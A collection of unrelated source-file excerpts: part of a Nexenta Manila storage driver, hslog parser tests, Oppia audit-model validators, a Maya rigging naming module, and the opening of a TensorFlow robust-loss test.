return [location]
def create_share_from_snapshot(self, context, share, snapshot,
share_server=None):
"""Is called to create share from snapshot."""
LOG.debug('Creating share from snapshot %s.', snapshot['name'])
url = ('storage/pools/%(pool)s/'
'filesystems/%(fs)s/snapshots/%(snap)s/clone') % {
'pool': self.pool_name,
'fs': PATH_DELIMITER.join(
(self.fs_prefix, snapshot['share_name'])),
'snap': snapshot['name']}
location = {
'path': '{}:/{}/{}/{}'.format(self.nef_host, self.pool_name,
self.fs_prefix, share['name'])
}
path = '/'.join((self.pool_name, self.fs_prefix, share['name']))
data = {
'targetPath': path,
'quotaSize': share['size'] * units.Gi,
'recordSize': 4 * units.Ki,
'compressionMode': self.dataset_compression,
}
if not self.configuration.nexenta_thin_provisioning:
data['reservationSize'] = share['size'] * units.Gi
self.nef.post(url, data)
try:
self._add_permission(share['name'])
except exception.NexentaException:
LOG.exception(
_LE('Failed to add permissions for %s'), share['name'])
try:
self.delete_share(None, share)
except exception.NexentaException:
LOG.warning(_LW("Cannot destroy cloned filesystem: "
"%(vol)s/%(filesystem)s"),
{'vol': self.pool_name,
'filesystem': '/'.join(
(self.fs_prefix, share['name']))})
raise
self.provisioned_capacity += share['size']
return [location]
def delete_share(self, context, share, share_server=None):
"""Delete a share."""
LOG.debug('Deleting share: %s.', share['name'])
url = 'storage/pools/%(pool)s/filesystems/%(fs)s' % {
'pool': self.pool_name,
'fs': PATH_DELIMITER.join([self.fs_prefix, share['name']]),
}
self.nef.delete(url)
self.provisioned_capacity -= share['size']
def extend_share(self, share, new_size, share_server=None):
"""Extends a share."""
LOG.debug(
'Extending share: %(name)s to %(size)sG.', (
{'name': share['name'], 'size': new_size}))
self._set_quota(share['name'], new_size)
self.provisioned_capacity += (new_size - share['size'])
def shrink_share(self, share, new_size, share_server=None):
"""Shrinks size of existing share."""
LOG.debug(
'Shrinking share: %(name)s to %(size)sG.', {
'name': share['name'], 'size': new_size})
url = 'storage/pools/{}/filesystems/{}%2F{}'.format(self.pool_name,
self.fs_prefix,
share['name'])
used = self.nef.get(url)['bytesUsed'] / units.Gi
if used > new_size:
raise exception.ShareShrinkingPossibleDataLoss(
share_id=share['id'])
self._set_quota(share['name'], new_size)
self.provisioned_capacity += (share['size'] - new_size)
def create_snapshot(self, context, snapshot, share_server=None):
"""Create a snapshot."""
LOG.debug('Creating a snapshot of share: %s.', snapshot['share_name'])
url = 'storage/pools/%(pool)s/filesystems/%(fs)s/snapshots' % {
'pool': self.pool_name,
'fs': PATH_DELIMITER.join(
(self.fs_prefix, snapshot['share_name'])),
}
data = {'name': snapshot['name']}
self.nef.post(url, data)
def delete_snapshot(self, context, snapshot, share_server=None):
"""Delete a snapshot."""
LOG.debug('Deleting a snapshot: %(shr_name)s@%(snap_name)s.', {
'shr_name': snapshot['share_name'],
'snap_name': snapshot['name']})
url = ('storage/pools/%(pool)s/filesystems/%(fs)s/snapshots/'
'%(snap)s') % {'pool': self.pool_name,
'fs': PATH_DELIMITER.join(
(self.fs_prefix, snapshot['share_name'])),
'snap': snapshot['name']}
try:
self.nef.delete(url)
except exception.NexentaException as e:
if e.kwargs['code'] == 'ENOENT':
LOG.warning(
_LW('snapshot %(name)s not found, response: %(msg)s'), {
'name': snapshot['name'], 'msg': e.msg})
else:
raise
def update_access(self, context, share, access_rules, add_rules,
delete_rules, share_server=None):
"""Update access rules for given share.
Using access_rules list for both adding and deleting rules.
:param context: The `context.RequestContext` object for the request
:param share: Share that will have its access rules updated.
:param access_rules: All access rules for given share. This list
is enough to update the access rules for given share.
:param add_rules: Empty List or List of access rules which should be
added. access_rules already contains these rules. Not used by this
driver.
:param delete_rules: Empty List or List of access rules which should be
removed. access_rules doesn't contain these rules. Not used by
this driver.
:param share_server: Data structure with share server information.
Not used by this driver.
"""
LOG.debug('Updating access to share %s.', share)
rw_list = []
ro_list = []
security_contexts = []
for rule in access_rules:
if rule['access_type'].lower() != 'ip':
msg = _('Only IP access type is supported.')
raise exception.InvalidShareAccess(reason=msg)
else:
if rule['access_level'] == common.ACCESS_LEVEL_RW:
rw_list.append(rule['access_to'])
else:
ro_list.append(rule['access_to'])
def append_sc(addr_list, sc_type):
for addr in addr_list:
address_mask = addr.strip().split('/', 1)
address = address_mask[0]
ls = [{"allow": True, "etype": "network", "entity": address}]
if len(address_mask) == 2:
try:
mask = int(address_mask[1])
if mask != 32:
ls[0]['mask'] = mask
except Exception:
raise exception.InvalidInput(
reason=_(
'<{}> is not a valid access parameter').format(
addr))
new_sc = {"securityModes": ["sys"]}
new_sc[sc_type] = ls
security_contexts.append(new_sc)
append_sc(rw_list, 'readWriteList')
append_sc(ro_list, 'readOnlyList')
data = {"securityContexts": security_contexts}
url = 'nas/nfs/' + PATH_DELIMITER.join(
(self.pool_name, self.fs_prefix, share['name']))
self.nef.put(url, data)
def _set_quota(self, share_name, new_size):
quota = new_size * units.Gi
data = {'quotaSize': quota}
if not self.configuration.nexenta_thin_provisioning:
data['reservationSize'] = quota
url = 'storage/pools/{}/filesystems/{}%2F{}'.format(self.pool_name,
self.fs_prefix,
share_name)
self.nef.put(url, data)
def _update_share_stats(self, data=None):
super(NexentaNasDriver, self)._update_share_stats()
total, free, allocated = self._get_capacity_info()
data = {
'vendor_name': 'Nexenta',
'storage_protocol': self.storage_protocol,
'share_backend_name': self.share_backend_name,
'nfs_mount_point_base': self.nfs_mount_point_base,
'driver_version': VERSION,
'pools': [{
'pool_name': self.pool_name,
'total_capacity_gb': total,
'free_capacity_gb': free,
'reserved_percentage': (
self.configuration.reserved_share_percentage),
'max_over_subscription_ratio': (
self.configuration.safe_get(
'max_over_subscription_ratio')),
'thin_provisioning':
self.configuration.nexenta_thin_provisioning,
'provisioned_capacity_gb': self.provisioned_capacity,
}],
}
self._stats.update(data)
def _get_capacity_info(self):
"""Calculate available space on the NFS share."""
url = 'storage/pools/{}/filesystems/{}'.format(self.pool_name,
self.fs_prefix)
data = self.nef.get(url)
total = utils.bytes_to_gb(data['bytesAvailable'])
allocated = utils.bytes_to_gb(data['bytesUsed'])
free = total - allocated
return total, free, allocated
def _add_permission(self, share_name):
"""Share NFS filesystem on NexentaStor Appliance.
:param share_name: relative filesystem name to be shared
"""
LOG.debug(
'Creating RW ACE for filesystem everyone on Nexenta Store '
'for <%s> filesystem.', share_name)
url = 'storage/pools/{}/filesystems/{}/acl'.format(
self.pool_name, PATH_DELIMITER.join((self.fs_prefix, share_name)))
data = {
"type": "allow",
"principal": "everyone@",
"permissions": [
"list_directory",
"read_data",
"add_file",
"write_data",
"add_subdirectory",
"append_data",
"read_xattr",
"write_xattr",
"execute",
"delete_child",
"read_attributes",
"write_attributes",
"delete",
"read_acl",
"write_acl",
"write_owner",
"synchronize",
],
"flags": [
"file_inherit",
"dir_inherit",
],
}
self.nef.post(url, data)
LOG.debug(
'RW ACE for filesystem <%s> on Nexenta Store has been '
'successfully created.', share_name)
|
the-stack_106_19091
|
from datetime import datetime, time, timedelta
from io import StringIO
from unittest.mock import patch
import pytest
from aniso8601 import parse_datetime, parse_time
from hearthstone.enums import (
CardType, ChoiceType, GameTag, OptionType,
PlayReq, PlayState, PowerType, State, Step, Zone
)
from hslog import LogParser, packets
from hslog.exceptions import ParsingError
from hslog.parser import parse_initial_tag
from . import data
def test_create_empty_game():
parser = LogParser()
parser.read(StringIO(data.EMPTY_GAME))
parser.flush()
# Test resulting game/entities
assert len(parser.games) == 1
packet_tree = parser.games[0]
game = packet_tree.export().game
assert len(game._entities) == 3
assert len(game.players) == 2
assert game._entities[1] is game
assert game._entities[1].id == 1
assert game._entities[2] is game.players[0]
assert game._entities[3] is game.players[1]
assert game.initial_state == State.INVALID
assert game.initial_step == Step.INVALID
# Test player objects
assert game.players[0].id == 2
assert game.players[0].player_id == 1
assert game.players[0].account_hi == 1
assert game.players[0].account_lo == 0
assert game.players[0].is_ai
assert not game.players[0].name
assert game.players[1].id == 3
assert game.players[1].player_id == 2
assert game.players[1].account_hi == 3
assert game.players[1].account_lo == 2
assert not game.players[1].is_ai
assert not game.players[1].name
# Test packet structure
assert len(packet_tree.packets) == 1
packet = packet_tree.packets[0]
assert packet.power_type == PowerType.CREATE_GAME
assert packet.entity == game.id == 1
# Player packet objects are not the same as players
assert packet.players[0].entity.entity_id == game.players[0].id
assert packet.players[0].player_id == game.players[0].player_id
assert packet.players[1].entity.entity_id == game.players[1].id
assert packet.players[1].player_id == game.players[1].player_id
# All tags should be empty (we didn't pass any)
assert not game.tags
assert not game.players[0].tags
assert not game.players[1].tags
# Check some basic logic
assert game.get_player(1) is game.players[0]
assert game.get_player(2) is game.players[1]
def test_tag_value_parsing():
tag, value = parse_initial_tag("tag=ZONE value=PLAY")
assert tag == GameTag.ZONE
assert value == Zone.PLAY
tag, value = parse_initial_tag("tag=CARDTYPE value=PLAYER")
assert tag == GameTag.CARDTYPE
assert value == CardType.PLAYER
tag, value = parse_initial_tag("tag=1 value=2")
assert tag == 1
assert value == 2
tag, value = parse_initial_tag("tag=9999998 value=123")
assert tag == 9999998
assert value == 123
def test_game_initialization():
parser = LogParser()
parser.read(StringIO(data.INITIAL_GAME))
parser.flush()
assert len(parser.games) == 1
packet_tree = parser.games[0]
game = packet_tree.export().game
assert len(game._entities) == 3
assert len(game.players) == 2
assert game.tags == {
GameTag.TURN: 1,
GameTag.ZONE: Zone.PLAY,
GameTag.ENTITY_ID: 1,
GameTag.NEXT_STEP: Step.BEGIN_MULLIGAN,
GameTag.CARDTYPE: CardType.GAME,
GameTag.STATE: State.RUNNING,
}
assert game.initial_state == State.RUNNING
assert game.initial_step == Step.INVALID
assert game.players[0].tags == {
GameTag.PLAYSTATE: PlayState.PLAYING,
GameTag.PLAYER_ID: 1,
GameTag.TEAM_ID: 1,
GameTag.ZONE: Zone.PLAY,
GameTag.CONTROLLER: 1,
GameTag.ENTITY_ID: 2,
GameTag.CARDTYPE: CardType.PLAYER,
}
assert game.players[1].tags == {
GameTag.PLAYSTATE: PlayState.PLAYING,
GameTag.CURRENT_PLAYER: 1,
GameTag.FIRST_PLAYER: 1,
GameTag.PLAYER_ID: 2,
GameTag.TEAM_ID: 2,
GameTag.ZONE: Zone.PLAY,
GameTag.CONTROLLER: 2,
GameTag.ENTITY_ID: 3,
GameTag.CARDTYPE: CardType.PLAYER,
}
def test_timestamp_parsing():
parser = LogParser()
parser.read(StringIO(data.INITIAL_GAME))
parser.flush()
assert parser.games[0].packets[0].ts == time(2, 59, 14, 608862)
# Test with an initial datetime
parser2 = LogParser()
parser2._current_date = datetime(2015, 1, 1)
parser2.read(StringIO(data.INITIAL_GAME))
parser2.flush()
assert parser2.games[0].packets[0].ts == datetime(2015, 1, 1, 2, 59, 14, 608862)
# Same test, with timezone
parser2 = LogParser()
parser2._current_date = parse_datetime("2015-01-01T02:58:00+0200")
parser2.read(StringIO(data.INITIAL_GAME))
parser2.flush()
ts = parser2.games[0].packets[0].ts
assert ts.year == 2015
assert ts.hour == 2
assert ts.second == 14
assert ts.tzinfo
assert ts.utcoffset() == timedelta(hours=2)
def test_repeated_timestamps():
parser = LogParser()
parser._current_date = parse_datetime("2015-01-01T02:58:00+0200")
parser.read(StringIO(data.INITIAL_GAME))
with patch("hslog.parser.parse_time", wraps=parse_time) as spy:
parser.read(StringIO(data.REPEATED_TIMESTAMP))
spy.assert_called_once() # The same repeated timestamp should only be parsed once
ts1 = parser.games[0].packets[-1].ts
ts2 = parser.games[0].packets[-2].ts
assert ts1 == ts2
def test_unroundable_timestamp():
parser = LogParser()
parser.read(StringIO(data.INITIAL_GAME))
parser.read(StringIO(data.UNROUNDABLE_TIMESTAMP))
parser.flush()
# Timestamp has to be truncated
assert parser.games[0].packets[1].ts == time(14, 43, 59, 999999)
def test_info_outside_of_metadata():
parser = LogParser()
parser.read(StringIO(data.INITIAL_GAME))
parser.flush()
info = u"D 02:59:14.6500380 GameState.DebugPrintPower() - Info[0] = 99"
parser.read(StringIO(info))
parser.flush()
def test_empty_entity_in_options():
parser = LogParser()
parser.read(StringIO(data.INITIAL_GAME))
parser.flush()
line = "target 0 entity="
with pytest.raises(ParsingError):
# This can happen, but the game is corrupt
parser.handle_options(None, line)
def test_warn_level():
parser = LogParser()
parser.read(StringIO(data.INITIAL_GAME))
parser.flush()
line = u"W 09:09:23.1428700 GameState.ReportStuck() - Stuck for 10s 89ms. {...}"
parser.read(StringIO(line))
parser.flush()
def test_error_level():
parser = LogParser()
parser.read(StringIO(data.INITIAL_GAME))
parser.flush()
line = u"E 02:08:13.8318679 SubSpellController {...}"
parser.read(StringIO(line))
parser.flush()
def test_empty_tasklist():
parser = LogParser()
parser.read(StringIO(data.INITIAL_GAME))
parser.flush()
ts = datetime.now()
msg = "id=4 Player=The Innkeeper TaskList=1 ChoiceType=GENERAL CountMin=1 CountMax=1"
choices = parser.handle_entity_choices(ts, msg)
assert choices
assert choices.id == 4
assert choices.player.name == "The Innkeeper"
assert choices.tasklist == 1
assert choices.type == ChoiceType.GENERAL
assert choices.min == 1
assert choices.max == 1
# Test empty tasklist
msg = "id=4 Player=The Innkeeper TaskList= ChoiceType=GENERAL CountMin=1 CountMax=1"
choices = parser.handle_entity_choices(ts, msg)
assert choices.tasklist is None
def test_tag_change_unknown_entity_format():
# Format changed in 15590
parser = LogParser()
parser.read(StringIO(data.INITIAL_GAME))
parser.flush()
entity_format = (
"[name=UNKNOWN ENTITY [cardType=INVALID] id=24 zone=DECK zonePos=0 cardId= player=1]"
)
id = parser.parse_entity_id(entity_format)
assert id == 24
line = "TAG_CHANGE Entity=%s tag=ZONE value=HAND" % (entity_format)
packet = parser.handle_power(None, "TAG_CHANGE", line)
assert packet.power_type == PowerType.TAG_CHANGE
assert packet.entity == id
assert packet.tag == GameTag.ZONE
assert packet.value == Zone.HAND
def test_initial_deck_initial_controller():
parser = LogParser()
parser.read(StringIO(data.INITIAL_GAME))
parser.read(StringIO(data.FULL_ENTITY))
parser.flush()
packet_tree = parser.games[0]
game = packet_tree.export().game
assert len(list(game.players[0].initial_deck)) == 1
assert len(list(game.players[1].initial_deck)) == 0
parser = LogParser()
parser.read(StringIO(data.INITIAL_GAME))
parser.read(StringIO(data.FULL_ENTITY))
parser.read(StringIO(data.CONTROLLER_CHANGE))
parser.flush()
packet_tree = parser.games[0]
game = packet_tree.export().game
assert len(list(game.players[0].initial_deck)) == 1
assert len(list(game.players[1].initial_deck)) == 0
def test_invalid_game_one_player():
parser = LogParser()
with pytest.raises(ParsingError):
parser.read(StringIO(data.INVALID_GAME))
def test_options_packet_with_errors():
parser = LogParser()
parser.read(StringIO(data.INITIAL_GAME))
parser.read(StringIO(data.OPTIONS_WITH_ERRORS))
parser.flush()
packet_tree = parser.games[0]
options_packet = packet_tree.packets[-1]
op0 = options_packet.options[0]
assert op0.id == 0
assert op0.type == OptionType.END_TURN
assert op0.entity is None
assert op0.error == PlayReq.INVALID
assert op0.error_param is None
op1 = options_packet.options[1]
assert op1.id == 1
assert op1.type == OptionType.POWER
assert op1.entity == 33
assert op1.error is None
assert op1.error_param is None
assert len(op1.options) == 12
target = op1.options[11]
assert target.id == 11
assert target.entity == 37
assert target.error == PlayReq.REQ_TARGET_MAX_ATTACK
assert target.error_param == 3
def test_options_no_option_packet():
parser = LogParser()
parser.read(StringIO(data.INITIAL_GAME))
with pytest.raises(ParsingError):
parser.handle_options(None, "option 0 type=END_TURN mainEntity=")
def test_suboptions_no_option_packet():
parser = LogParser()
parser.read(StringIO(data.INITIAL_GAME))
with pytest.raises(ParsingError):
parser.handle_options(None, "subOption 0 entity=1")
def test_error_unhandled_powtype():
parser = LogParser()
parser.read(StringIO(data.INITIAL_GAME))
# This shouldn't raise an exception
parser.read(StringIO(
"D 02:13:03.1360001 GameState.DebugPrintPower() - "
"ERROR: unhandled PowType RESET_GAME"
))
parser.flush()
def test_target_no_entity():
parser = LogParser()
parser.read(StringIO(data.INITIAL_GAME))
parser.read(StringIO(
"D 01:02:58.3254653 GameState.DebugPrintOptions() - id=2\n" # noqa
"D 01:02:58.3254653 GameState.DebugPrintOptions() - option 0 type=END_TURN mainEntity= error=INVALID errorParam=\n" # noqa
"D 01:02:58.3254653 GameState.DebugPrintOptions() - option 1 type=POWER mainEntity= error=NONE errorParam=\n" # noqa
"D 01:02:58.3254653 GameState.DebugPrintOptions() - target 0 entity= error=NONE errorParam=\n" # noqa
"D 01:02:58.3254653 GameState.DebugPrintOptions() - target 1 entity= error=NONE errorParam=\n" # noqa
))
parser.flush()
packet_tree = parser.games[0]
options_packet = packet_tree.packets[-1]
option = options_packet.options[1]
target = option.options[0]
assert target.entity is None
assert target.error is None
assert target.error_param is None
def test_reset_game():
parser = LogParser()
parser.read(StringIO(data.INITIAL_GAME))
# This shouldn't raise an exception
parser.read(StringIO(
"D 15:39:19.3190860 GameState.DebugPrintPower() - BLOCK_START BlockType=GAME_RESET Entity=[entityName=Temporal Loop id=17 zone=PLAY zonePos=0 cardId=GILA_900p player=1] EffectCardId= EffectIndex=-1 Target=0 SubOption=-1\n" # noqa
"D 15:39:19.3190860 GameState.DebugPrintPower() - RESET_GAME\n"
))
parser.flush()
def test_sub_spell():
parser = LogParser()
parser.read(StringIO(data.INITIAL_GAME))
parser.read(StringIO(data.SUB_SPELL_BLOCK))
parser.flush()
packet_tree = parser.games[0]
play_block = packet_tree.packets[-1]
power_block = play_block.packets[0]
assert len(power_block.packets) == 1
sub_spell_packet = power_block.packets[0]
assert sub_spell_packet.spell_prefab_guid == (
"CannonBarrage_Missile_FX:e26b4681614e0964aa8ef7afebc560d1"
)
assert sub_spell_packet.source == 59
assert sub_spell_packet.target_count == 1
assert sub_spell_packet.targets == [41]
def test_sub_spell_battlegrounds():
parser = LogParser()
parser.read(StringIO(data.INITIAL_GAME))
parser.read(StringIO(data.BGS_SUB_SPELL_BLOCK))
parser.flush()
packet_tree = parser.games[0]
play_block = packet_tree.packets[-1]
power_block = play_block.packets[0]
assert len(power_block.packets) == 1
sub_spell_packet = power_block.packets[0]
assert sub_spell_packet.spell_prefab_guid == (
"Bacon_FreezeMinions_AE_Super.prefab:49de73d8b72602f47994a795a78f050d"
)
assert sub_spell_packet.source == 0
assert sub_spell_packet.target_count == 0
assert sub_spell_packet.targets == []
def test_options_missing_block_end():
parser = LogParser()
parser.read(StringIO(data.INITIAL_GAME))
parser.read(StringIO(
"D 09:01:05.7959635 GameState.DebugPrintPower() - BLOCK_START BlockType=ATTACK Entity=[entityName=Rat Pack id=2974 zone=PLAY zonePos=2 cardId=CFM_316 player=3] EffectCardId= EffectIndex=1 Target=0 SubOption=-1 \n" # noqa
"D 09:01:05.7959635 GameState.DebugPrintPower() - BLOCK_START BlockType=TRIGGER Entity=[entityName=3ofKindCheckPlayerEnchant id=3319 zone=PLAY zonePos=0 cardId=TB_BaconShop_3ofKindChecke player=3] EffectCardId= EffectIndex=-1 Target=0 SubOption=-1 TriggerKeyword=0\n" # noqa
"D 09:01:05.7959635 GameState.DebugPrintPower() - BLOCK_END\n" # noqa
"D 09:01:05.7959635 GameState.DebugPrintPower() - TAG_CHANGE Entity=BehEh#1355 tag=NUM_OPTIONS_PLAYED_THIS_TURN value=15 \n" # noqa
"D 09:01:05.8620235 GameState.DebugPrintOptions() - id=76\n" # noqa
"D 09:01:05.8620235 GameState.DebugPrintOptions() - option 0 type=END_TURN mainEntity= error=INVALID errorParam=\n" # noqa
))
parser.flush()
packet_tree = parser.games[0]
block_without_end = packet_tree.packets[1]
assert isinstance(block_without_end, packets.Block)
assert block_without_end.ended
options_packet = packet_tree.packets[-1]
assert isinstance(options_packet, packets.Options)
def test_cached_tag_for_dormant_change():
parser = LogParser()
parser.read(StringIO(data.INITIAL_GAME))
parser.read(StringIO(data.CACHED_TAG_FOR_DORMANT_CHANGE))
parser.flush()
packet_tree = parser.games[0]
cached_tag_packet = packet_tree.packets[1]
assert cached_tag_packet.entity == 417
assert cached_tag_packet.tag == GameTag.DEATHRATTLE
assert cached_tag_packet.value == 1
def test_cached_tag_for_dormant_change_entity_id_only():
parser = LogParser()
parser.read(StringIO(data.INITIAL_GAME))
parser.read(StringIO(data.CACHED_TAG_FOR_DORMANT_CHANGE_SHORT_ENTITY))
parser.flush()
packet_tree = parser.games[0]
cached_tag_packet = packet_tree.packets[1]
assert cached_tag_packet.entity == 593
assert cached_tag_packet.tag == GameTag.DEATHRATTLE
assert cached_tag_packet.value == 1
def test_vo_spell_only():
parser = LogParser()
parser.read(StringIO(data.INITIAL_GAME))
parser.read(StringIO(data.VO_SPELL))
parser.flush()
packet_tree = parser.games[0]
vo_spell_packet = packet_tree.packets[1]
assert vo_spell_packet.brguid == (
"VO_BTA_BOSS_07h2_Female_NightElf_Mission_Fight_07_PlayerStart_01.prefab:616c9e5" +
"7bb7fce54684e26be50462d17"
)
assert vo_spell_packet.vospguid == ""
assert vo_spell_packet.blocking is True
assert vo_spell_packet.delayms == 1000
def test_shuffle_deck_only():
parser = LogParser()
parser.read(StringIO(data.INITIAL_GAME))
parser.read(StringIO(data.SHUFFLE_DECK))
parser.flush()
packet_tree = parser.games[0]
shuffle_deck_packet = packet_tree.packets[1]
assert shuffle_deck_packet.player_id == 2
|
the-stack_106_19093
|
# coding: utf-8
#
# Copyright 2020 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Validators for audit models."""
from __future__ import absolute_import # pylint: disable=import-only-modules
from __future__ import unicode_literals # pylint: disable=import-only-modules
from core.domain import base_model_validators
class RoleQueryAuditModelValidator(base_model_validators.BaseModelValidator):
"""Class for validating RoleQueryAuditModels."""
@classmethod
def _get_model_id_regex(cls, item):
# Valid id: [user_id].[timestamp_in_sec].[intent].[random_number]
regex_string = '^%s\\.\\d+\\.%s\\.\\d+$' % (item.user_id, item.intent)
return regex_string
@classmethod
def _get_external_id_relationships(cls, item):
return [
base_model_validators.UserSettingsModelFetcherDetails(
'user_ids', [item.user_id],
may_contain_system_ids=False,
may_contain_pseudonymous_ids=False)]
class UsernameChangeAuditModelValidator(
base_model_validators.BaseModelValidator):
"""Class for validating UsernameChangeAuditModels."""
@classmethod
def _get_model_id_regex(cls, item):
# Valid id: [committer_id].[timestamp_in_sec]
# committer_id refers to the user that is making the change.
regex_string = '^%s\\.\\d+$' % item.committer_id
return regex_string
@classmethod
def _get_external_id_relationships(cls, item):
return [
base_model_validators.UserSettingsModelFetcherDetails(
'committer_ids', [item.committer_id],
may_contain_system_ids=False,
may_contain_pseudonymous_ids=False)]
|
the-stack_106_19095
|
import pymel.core as pm
# ------------------------------------------------------------------------------
# -- This is a list of Component types. These are used in META nodes
# -- to define the type of component (such as guide, skeleton etc)
COMPONENT_MARKER = 'crabComponent'
# ------------------------------------------------------------------------------
# -- This is a list of names which define attributes on meta nodes.
META_IDENTIFIER = 'Identifier'
META_VERSION = 'Version'
META_OPTIONS = 'Options'
META_CONTENTS = 'Contents'
# ------------------------------------------------------------------------------
# -- This is a list of attribute names used by the internals of
# -- crab to resolve relationships between objects
BOUND = 'crabBinding'
BEHAVIOUR_DATA = 'crabBehaviours'
# ------------------------------------------------------------------------------
RIG_ROOT_LINK_ATTR = 'crabRigHost'
CONNECTION_PREFIX = 'crabRootConnection'
SKELETON_ROOT_LINK_ATTR = '%sSkeleton' % CONNECTION_PREFIX
CONTROL_ROOT_LINK_ATTR = '%sControls' % CONNECTION_PREFIX
GUIDE_ROOT_LINK_ATTR = '%sGuide' % CONNECTION_PREFIX
# ------------------------------------------------------------------------------
# -- This is a group of layer names
HIDDEN_LAYER = 'Hidden'
CONTROL_LAYER = 'Controls'
SKELETON_LAYER = 'Skeleton'
GEOMETRY_LAYER = 'Geometry'
# ------------------------------------------------------------------------------
# -- This is a list of name prefixes for structural objects created
# -- within a crab rig hierarchy
RIG_ROOT = 'RIG'
RIG_COMPONENT = 'CMP'
GUIDE_COMPONENT = 'GCM'
META = 'META'
# ------------------------------------------------------------------------------
# -- This is a list of pre-fixes for general use within a crab plugin
# -- in order to keep naming consistent
ORG = 'ORG'
CONTROL = 'CTL'
ZERO = 'ZRO'
OFFSET = 'OFF'
SKELETON = 'SKL'
MECHANICAL = 'MEC'
MATH = 'MATH'
MARKER = 'LOC'
GUIDE = 'GDE'
PIVOT = 'PIV'
LOGIC = 'LGC'
SNAP = 'SNP'
IK = 'IKH'
EFFECTOR = 'EFF'
CLUSTER = 'CLS'
UPVECTOR = 'UPV'
SPLINE = 'CRV'
CONSTRAINT = 'CNS'
CONSTRAINTGROUP = 'CNSG'
PREFIXES = [
ORG,
CONTROL,
ZERO,
OFFSET,
SKELETON,
MECHANICAL,
MATH,
MARKER,
GUIDE,
PIVOT,
LOGIC,
SNAP,
IK,
EFFECTOR,
CLUSTER,
UPVECTOR,
SPLINE,
CONSTRAINT,
CONSTRAINTGROUP,
]
# ------------------------------------------------------------------------------
# -- This is a list of suffixes for general use within a crab plugin
# -- in order to keep naming consistent
# -- Sides and Locations
LEFT = 'LF'
RIGHT = 'RT'
MIDDLE = 'MD'
FRONT = 'FR'
BACK = 'BK'
TOP = 'TP'
BOTTOM = 'BT'
SIDELESS = 'NA'
LOCATIONS = [
LEFT,
RIGHT,
MIDDLE,
FRONT,
BACK,
TOP,
BOTTOM,
SIDELESS,
]
# ------------------------------------------------------------------------------
# -- Define colours based on categories
LEFT_COLOR = [252, 48, 1]
RIGHT_COLOR = [0, 162, 254]
MIDDLE_COLOR = [254, 209, 0]
NON_ANIMATABLE_COLOUR = [150, 150, 150]
GUIDE_COLOR = [162, 222, 0]
# ------------------------------------------------------------------------------
# -- Defines attribute defaults
DEFAULT_CONTROL_ROTATION_ORDER = 5
# ------------------------------------------------------------------------------
# -- Defines attribute defaults
OWNED_LAYERS = [
'Hidden',
'Controls',
'Skeleton',
'Geometry',
]
# ------------------------------------------------------------------------------
# noinspection PyUnresolvedReferences
def name(prefix, description, side, counter=1):
"""
Generates a unique name with the given naming parts
:param prefix: Typically this is used to denote usage type. Note that this
should not be 'node type' but should be representative of what the node
is actually being used for in the rig.
:type prefix: str
:param description: This is the descriptive element of the rig and should
ideally be upper camel case.
:type description: str
:param side: This is the location of the element, such as LF, RT or MD etc
:type side: str
:param counter: To ensure all names are unique we use a counter. By default
all counters start at 1, but you may override this.
:type counter: int
:return:
"""
while True:
candidate = '%s_%s_%s_%s' % (
prefix.upper(),
description,
counter,
side.upper(),
)
# -- If the name is unique, return it
if not pm.objExists(candidate):
return candidate
# -- The name already exists, so increment our
# -- counter
counter += 1
# ------------------------------------------------------------------------------
def get_prefix(given_name):
"""
Assuming the given name adheres to the naming convention of crab this
will extract the prefix element of the name.
:param given_name: Name to extract from
:type given_name: str or pm.nt.DependNode
:return: str
"""
return str(given_name).split(':')[-1].split('_')[0]
# ------------------------------------------------------------------------------
def get_description(given_name):
"""
Assuming the given name adheres to the naming convention of crab this
will extract the descriptive element of the name.
:param given_name: Name to extract from
:type given_name: str or pm.nt.DependNode
:return: str
"""
return str(given_name).split(':')[-1].split('_')[1]
# ------------------------------------------------------------------------------
def get_counter(given_name):
"""
Assuming the given name adheres to the naming convention of crab this
will extract the counter element of the name.
:param given_name: Name to extract from
:type given_name: str or pm.nt.DependNode
:return: int
"""
parts = given_name.split('_')
for part in parts:
if part.isnumeric():
return int(part)
return None
# ------------------------------------------------------------------------------
def get_side(given_name):
"""
Assuming the given name adheres to the naming convention of crab this
will extract the side/location element of the name.
:param given_name: Name to extract from
:type given_name: str or pm.nt.DependNode
:return: str
"""
parts = given_name.split('_')
if not parts:
return ''
return parts[-1]
|
the-stack_106_19096
|
# coding=utf-8
# Copyright 2019 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for general.py."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
from robust_loss import general
class LossfunTest(tf.test.TestCase):
def setUp(self):
super(LossfunTest, self).setUp()
np.random.seed(0)
def _assert_all_close_according_to_type(self, a, b):
"""AssertAllClose() with tighter thresholds for float64 than float32."""
self.assertAllCloseAccordingToType(
a, b, rtol=1e-15, atol=1e-15, float_rtol=1e-6, float_atol=1e-6)
def _precompute_lossfun_inputs(self, float_dtype):
"""Precompute a loss and its derivatives for random inputs and parameters.
Generates a large number of random inputs to the loss, and random
shape/scale parameters for the loss function at each sample, and
computes the loss and its derivative with respect to all inputs and
parameters, returning everything to be used to assert various properties
in our unit tests.
Args:
float_dtype: The float precision to be used (np.float32 or np.float64).
Returns:
A tuple containing:
(the number (int) of samples, and the length of all following arrays,
A np.array (float_dtype) of losses for each sample,
A np.array (float_dtype) of residuals of each sample (the loss inputs),
A np array (float_dtype) of shape parameters of each loss,
A np.array (float_dtype) of scale parameters of each loss,
A np.array (float_dtype) of derivatives of each loss wrt each x,
A np.array (float_dtype) of derivatives of each loss wrt each alpha,
A np.array (float_dtype) of derivatives of each loss wrt each scale)
Typical usage example:
(num_samples, loss, x, alpha, scale, d_x, d_alpha, d_scale)
= self._precompute_lossfun_inputs(np.float32)
"""
with self.session() as sess:
num_samples = 100000
# Normally distributed inputs.
